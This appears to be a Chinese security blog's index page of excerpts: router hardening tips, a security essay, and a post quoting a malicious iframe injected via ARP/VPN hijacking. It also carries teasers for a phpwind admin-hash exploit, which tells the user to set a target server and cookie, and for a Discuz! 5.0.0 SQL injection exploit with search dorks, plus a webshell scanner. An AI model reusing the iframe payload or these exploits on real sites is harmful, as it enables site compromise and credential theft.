1 禁止CDP(cisco Discovery Protocol)。如：
2 禁止其他的TCP、UDP Small服务。
3 禁止Finger服务。
4 建议禁止HTTP服务。
5 禁止BOOTp服务。
6 禁止IP Source Routing。
7 建议如果不需要ARP-Proxy服务则禁止它，路由器默认识开启的。
8禁止IP Directed Broadcast。
9 禁止IP Classless。
10 禁止ICMP协议的IP Unreachables, Redirects, Mask Replies。
11 建议禁止SNMP协议服务。在禁止时必须删除一些SNMP服务的默认配置。如：
12 如果没必要则禁止WINS和DNS服务。
13 明确禁止不使用的端口。

» 阅读全文

benjurry (benjurry_at_xfocus.org)

　说到木桶理论，可谓众所周知：一个由许多块长短不同的木板箍成的木桶，决定其容水量大小的并非是其中最长的那块木板或全部木板长度的平均值，而是取决于其中最短的那块木板。要想提高木桶整体效应，不是增加最长的那块木板的长度，而是要下功夫补齐最短的那块木板的长度。这个理论由谁提出，目前已经无从考究了，但是这个理论的应用范围却是十分广泛，从经济学、企业管理到人力资源到个人发展。
同样这个理论也被引进了安全领域，在信息安全中，认为信息安全的防护强度取决于“马奇诺防线”中最为薄弱的一环，因此出现的一个状况是发现哪个安全问题严重就买什么样的产品。这个理论意义在于使我们认识到整个安全防护中，最短木块的巨大威胁，并针对最短木块进行改进。

» 阅读全文

郁闷来着，今天也被ARP玩了一回
本来好好的，突然发现www.sebug.net 主页上有马<iframe src='http://xxx.44986.com/bbs/data/xxx.html' height=2 width=0></iframe> 
郁闷，不太可能吧，不敢相信来着
我立马把站点关闭了。
查了半天没有发现什么问题，代码正常啊
咋回事呢，也没有发现机器不正常。

我用另一台机器开看sebug.net是正常的。难道是传说中的ARP会话截持。我是用路由拔号的，内网就两台机器，另一台还没开机呢，也没可能啊。而且我在另一台机器上打开网站也是正常的，没有被截持。我自己的机器打开红狼等很多网站都出现这样的情况，现在确定是被截持了。还是没有找到问题所在。问了几个朋友，无语。

我把所有的东东都关了，什么QQ，MSN……，晕，还是不行，VPN还没有断开，断开试试

VPN一断开，好了，晕，难道是VPN的IP被截持了，再连接上VPN又被截持了。试了几次，一样的情况
是VPN被截持了

有朋友用61.152.91.2这个VPN的，先别用了吧

ARP，牛……

在NEEAO那找到一个ARP的东东，好像可能实现这样的功能

熊猫烧香还在烧着在
可是.....刚在群里面看到他们又弄了个新的东东

金猪报喜
据说威力比熊猫烧香更变态
中病毒后，会先检查客户机上有没有中熊猫烧香，如果有，则清理掉

唉！又不知道有多少无辜的人……
祝他们好运吧

/*************************
说明：判断传递的变量中是否含有非法字符如$_POST、$_GET
功能：防注入
来源：www.freediscuz.net
**************************/

» 阅读全文

传说中的phpwind 0day?

The exploiet Of The All phpwind Version
爆admin的密码散列.
速度极慢...要有耐心

请自行修改
$path="/search.php"; 这个不用改
$server='luoq.net'; 改成目标地址
$cookie=' 你抓的cookies!

喜欢的朋友可以做个GUI界面出来!

» 阅读全文

---------------------------------------------------------------------------
discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------

» 阅读全文

本程序通杀:
ASP ASPX PHP CGI JSP VBS 等脚本WebShell
并能查出99%加密过的脚本WebShell
不过本程序由于检测过于苛刻.导致部分上传组件和比较强的后台管理程序也被列为危险代码.
请用户在扫描查杀中.对扫描出来的结果进行进一步的分析.

» 阅读全文